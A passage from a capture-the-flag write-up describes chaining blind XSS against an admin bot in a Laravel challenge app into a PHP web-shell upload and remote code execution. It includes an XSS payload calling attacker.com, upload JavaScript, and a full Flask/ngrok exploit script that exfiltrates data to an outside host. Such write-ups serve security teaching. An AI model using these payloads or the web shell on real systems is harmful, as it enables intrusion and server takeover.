<h2 id="Step-2-Huh-A-Bot-Could-it-Be-XSS"><a href="#Step-2-Huh-A-Bot-Could-it-Be-XSS" class="headerlink" title="Step 2: Huh? A Bot?? Could it Be XSS??"></a>Step 2: Huh? A Bot?? Could it Be XSS??</h2><p>There is an active bot simulation in this environment, which suggests we need to perform client-side exploitation, such as Cross-Site Scripting (XSS).</p>
<p>In this challenge, the bot acts as an administrator. Its workflow is as follows:</p>
<ol>
<li>Log in as an admin (username: <code>ilsya</code>).</li>
<li>Visit <code>/admin</code>.</li>
<li>Extract all <code>&lt;a href&gt;</code> elements in the HTML that contain the string <code>/admin</code>.</li>
<li>Systematically visit every discovered <code>/admin/...</code> link.</li>
</ol>
<p>The bot’s structural implementation looks like this:</p>
<pre><code class="language-js">async function run() {
    const context = await browserCtx();
    const visited = new Set&lt;string&gt;();

    try {
        const page = await context.newPage();
        await page.goto(`${process.env.BASE_URL}/login`);
        await page.fill('input[name="username"]', "ilsya");
        await page.fill('input[name="password"]', process.env.PASS_ADMIN!);
        await page.click('button[type="submit"]');
        await page.waitForSelector(".toast-ilsya-msg");
        
        await page.goto(`${process.env.BASE_URL}/admin`);
        const links = await page.$$eval("a[href]", (as) =&gt;
            as
                .map((a) =&gt; (a as HTMLAnchorElement).href)
                .filter((href) =&gt; href.includes("/admin"))
        );
        
        console.log(`Found ${links.length} /admin links.`);
        
        for (const url of links) {
            if (visited.has(url)) continue;
            visited.add(url);

            try {
                console.log(`Visiting: ${url}`);
                await page.goto(url, { waitUntil: "networkidle" });
                const title = await page.title();
                console.log(`  ✔️ ${url} - ${title}`);
            } catch (err) {
                console.error(`  ❌ Failed to visit ${url}:`, err);
            }
        }
    } catch (error) {
        console.error(error);
    } finally {
        await context.close();
    }
}
</code></pre>
<h2 id="Step-3-Blind-XSS"><a href="#Step-3-Blind-XSS" class="headerlink" title="Step 3: Blind XSS"></a>Step 3: Blind XSS</h2><p>While inspecting the source code inside <code>attachments/velixs-web-ori/app/Http/Controllers/Admin/WAProgrammerController.php</code>, we found an interesting implementation detail:</p>
<pre><code class="language-js">public function json(Request $request) {
    if(!$request-&gt;ajax()) return redirect()-&gt;route('admin.wagroup.index');
    
    $table = waGroup::all();
    return datatables()-&gt;of($table)
        -&gt;addColumn('whatsapp', function($row) {
            return '&lt;div class="d-flex justify-content-start align-items-center user-name"&gt;' .
                   '&lt;div class="avatar-wrapper"&gt;&lt;div class="avatar me-2"&gt;&lt;img src="'.$row-&gt;_image().'" alt="Avatar" class="rounded-circle"&gt;&lt;/div&gt;&lt;/div&gt;' .
                   '&lt;div class="d-flex flex-column"&gt;' .
                   '&lt;a href="'.$row-&gt;whatsapp_url.'" class="emp_name text-truncate"&gt;'.htmlspecialchars($row-&gt;name).'&lt;/a&gt;' .
                   '&lt;small class="emp_post text-truncate text-muted"&gt;&lt;/small&gt;' .
                   '&lt;/div&gt;&lt;/div&gt;';
        });
}
</code></pre>
<p>Notice this specific line:</p>
<pre><code class="language-html">&lt;a href="'.$row-&gt;whatsapp_url.'"
</code></pre>
<p>The value of <code>whatsapp_url</code> is directly concatenated into the raw HTML string without any <code>htmlspecialchars()</code> escaping or filtering. This means if we can control the <code>whatsapp_url</code> value, we can achieve XSS 😎.</p>
<p>We can submit our payload via the public submission form at <code>http://challenge.local:1391/whatsapp-programmer</code>.</p>
<p><img src="/../images/ACECTF-2025-Writeup-8.png"></p>
<p>The form expects a valid WhatsApp group link format, such as: <code>https://chat.whatsapp.com/HMl4A18fJftJ0NQkJ7Rglx</code>. We can append our injection payload directly to the URL parameters like this:</p>
<pre><code class="language-html">https://chat.whatsapp.com/HMl4A18fJftJ0NQkJ7Rglx?"&gt;&lt;img src=x onerror="fetch(`http://attacker.com`)"
</code></pre>
<p>Because the execution occurs strictly within the restricted admin panel interface, we cannot witness the output directly from our unauthenticated session. However, since the bot logs into the admin account and parses <code>/admin</code>, the script will execute inside its browser context.</p>
<p>This represents a classic <strong>Blind XSS</strong> vulnerability—we plant the payload, and the privileged bot trips the execution hook when reviewing submissions.</p>
<p>After submitting the injection URL, we trigger the bot execution script:<br><img src="/../images/ACECTF-2025-Writeup-9.png"></p>
<p>And it works perfectly! Blind XSS confirmed!<br><img src="/../images/ACECTF-2025-Writeup-10.png"></p>
<h2 id="Step-4-Blind-XSS-to-PHP-File-Upload-to-RCE"><a href="#Step-4-Blind-XSS-to-PHP-File-Upload-to-RCE" class="headerlink" title="Step 4: Blind XSS to PHP File Upload to RCE"></a>Step 4: Blind XSS to PHP File Upload to RCE</h2><p>Looking closely at <code>attachments\velixs-web-ori\config\file-manager.php</code>, we can see a file manager plugin configuration that restricts file operations to administrative sessions via custom middleware:</p>
<pre><code class="language-php">&lt;?php

use Alexusmai\LaravelFileManager\Services\ConfigService\DefaultConfigRepository;
use Alexusmai\LaravelFileManager\Services\ACLService\ConfigACLRepository;

return [
    'configRepository'  =&gt; DefaultConfigRepository::class,
    'aclRepository'     =&gt; ConfigACLRepository::class,
    'middleware'        =&gt; ['web', 'isadmin'],
    'routePrefix'       =&gt; 'files/ilsya',
    'diskList'          =&gt; ['public'],
];
</code></pre>
<p>According to <code>attachments\velixs-web-ori\vendor\alexusmai\laravel-file-manager\src\routes.php</code>, the upload endpoint maps directly to <code>/files/ilsya/upload</code>:</p>
<pre><code class="language-php">$config = resolve(ConfigRepository::class);

// App middleware list
$middleware = $config-&gt;getMiddleware();

Route::group([
    'middleware' =&gt; $middleware,
    'prefix'     =&gt; $config-&gt;getRoutePrefix(),
    'namespace'  =&gt; 'Alexusmai\LaravelFileManager\Controllers',
], function () {
    Route::post('upload', [FileManagerController::class, 'upload'])
        -&gt;name('fm.upload');
});
</code></pre>
<p>The processing logic inside <code>attachments\velixs-web-ori\vendor\alexusmai\laravel-file-manager\src\Controllers\FileManagerController.php</code> requires specific parameter structures (<code>disk</code>, <code>path</code>, and the raw <code>files[]</code> payload):</p>
<pre><code class="language-php">public function upload(RequestValidator $request): JsonResponse
{
    event(new FilesUploading($request));

    $uploadResponse = $this-&gt;fm-&gt;upload(
        $request-&gt;input('disk'),
        $request-&gt;input('path'),
        $request-&gt;file('files'),
        $request-&gt;input('overwrite')
    );

    event(new FilesUploaded($request));

    return response()-&gt;json($uploadResponse);
}
</code></pre>
<p>Since only verified administrative sessions can communicate with this endpoint, we can leverage our Blind XSS payload to force the admin bot to send the multipart file upload request on our behalf.</p>
<p>Here is the JavaScript XSS payload to perform the file creation:</p>
<pre><code class="language-js">(async () =&gt; {
    try {
        const csrfToken = document.querySelector('meta[name="csrf-token"]')?.content || "";
        const phpCode = `&lt;?php system($_GET['cmd']); ?&gt;`;
        const file = new File([phpCode], "shell.php", {
            type: "application/x-php",
        });

        const formData = new FormData();
        formData.append("disk", "public");
        formData.append("path", "/");
        formData.append("files[]", file);

        await fetch("/files/ilsya/upload", {
            method: "POST",
            headers: {
                "X-CSRF-TOKEN": csrfToken,
                Accept: "application/json",
            },
            body: formData,
            credentials: "include",
        });
    } catch (err) {
        console.error("Upload error:", err);
    }
})();
</code></pre>
<p>When the bot triggers the XSS payload, the PHP web shell is uploaded directly to the application’s storage path.<br><img src="/../images/ACECTF-2025-Writeup-11.png"></p>
<p>From here, we simply access our web shell at <code>http://challenge.local:1391/storage/shell.php?cmd=ls</code> to achieve Remote Code Execution (RCE)!<br><img src="/../images/ACECTF-2025-Writeup-12.png"></p>
<p><img src="/../images/ACECTF-2025-Writeup-13.png"></p>
<p>Below is the structured Python script utilizing Flask and PyNgrok to host the malicious JavaScript stage payload and orchestrate the exploit:</p>
<pre><code class="language-python">import requests
import string
import random
import time
from flask import Flask, request
from pyngrok import ngrok

# === CONFIGURATION ===
XSS_BOT_URL = "http://bot.local:1987"
CHALL_URL = "http://challenge.local:1391"
PORT = 9999
# =====================

# Establish ngrok tunnel connection
public_url = "http://" + ngrok.connect(addr=PORT, proto="tcp").public_url[5:]
print(f"[+] Tunnel established: {public_url}")

x = requests.Session()
app = Flask(__name__)

# Malicious payload executed by the administrative bot
javascript = f"""
(async () =&gt; {{
    try {{
        const csrfToken = document.querySelector('meta[name="csrf-token"]')?.content || '';
        const phpCode = `<!--?php system($_GET['cmd']); ?-->`;
        const file = new File([phpCode], "shell.php", {{ type: "application/x-php" }});

        const formData = new FormData();
        formData.append("disk", "public");
        formData.append("path", "/");
        formData.append("files[]", file);
        
        const uploadRes = await fetch("/files/ilsya/upload", {{
            method: "POST",
            headers: {{
                "X-CSRF-TOKEN": csrfToken,
                "Accept": "application/json"
            }},
            body: formData,
            credentials: "include"
        }});
        
        const resp = await uploadRes.json();
        
        // Exfiltrate response metadata back to our server
        await fetch('{public_url}/extract', {{
            method: 'POST',
            headers: {{
                'Content-Type': 'application/x-www-form-urlencoded'
            }},
            body: `data=${{encodeURIComponent(JSON.stringify(resp))}}`
        }});
    } catch (e) {{
        console.error(e);
    }}
}})();
"""

def trigger_xss():
    print("[*] Triggering bot visitor...")
    x.get(XSS_BOT_URL)
    res = x.post(XSS_BOT_URL + "/run")
    return res.text

@app.route("/script.js")
def script():
    return javascript, 200, {"Content-Type": "application/javascript"}

@app.route("/extract", methods=['POST', 'GET'])
def extract():
    print(f"[+] Received exfiltrated data: {request.form}")
    return "done", 200

@app.route('/exploit')
def exploit():
    return trigger_xss(), 200

if __name__ == "__main__":
    payload = f"""https://chat.whatsapp.com/GK80vSkE3JtKehkUGa36TD?"&gt;&lt;script src='{public_url}/script.js'&gt;&lt;/script&gt;"""
    print(f"\n[!] Target Payload:\n{payload}\n")
    print(f"[1] Submit the payload above to: {CHALL_URL}/whatsapp-programmer")
    print(f"[2] Navigate to http://localhost:{PORT}/exploit to trigger the XSS bot execution framework")
    print(f"[3] Once triggered, access your shell at: {CHALL_URL}/storage/shell.php?cmd=cat%20../../../flagNyaHarusPakeRCE.txt\n")
    
    app.run(host='0.0.0.0', port=PORT)
</code></pre>

      
       <hr><span style="font-style: italic;color: gray;"> Please cite the source when reposting. Readers are welcome to verify the references cited in the article and point out any errors or unclear expressions. </span>
    </div>
</article>





    <div id="comments">
    <script>
        {
            const comments = document.getElementById("comments");
            const script = document.createElement("script");
            script.src = "https://giscus.app/client.js";
            script.setAttribute('data-repo', "TanKnight7/TanKnight7.github.io");
            script.setAttribute('data-repo-id', "R_kgDOOxOm1A");
            script.setAttribute('data-category', "General");
            script.setAttribute('data-category-id', "DIC_kwDOOxOm1M4DBH1f");
            script.setAttribute('data-mapping', "pathname");
            script.setAttribute('data-strict', "0");
            script.setAttribute('data-reactions-enabled', "1");
            script.setAttribute('data-emit-metadata', "1");
            script.setAttribute('data-input-position', "top");
            script.setAttribute('data-theme', "light");
            script.setAttribute('data-lang', "en");
            script.setAttribute('data-loading', "lazy");
            script.setAttribute('crossorigin', "anonymous");
            script.setAttribute('async', "");
            comments.appendChild(script);
        }
    </script>
</div>



    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    ©2026 Tanknight
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="Toggle full screen shortcut key s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    

    
</style>







</html>
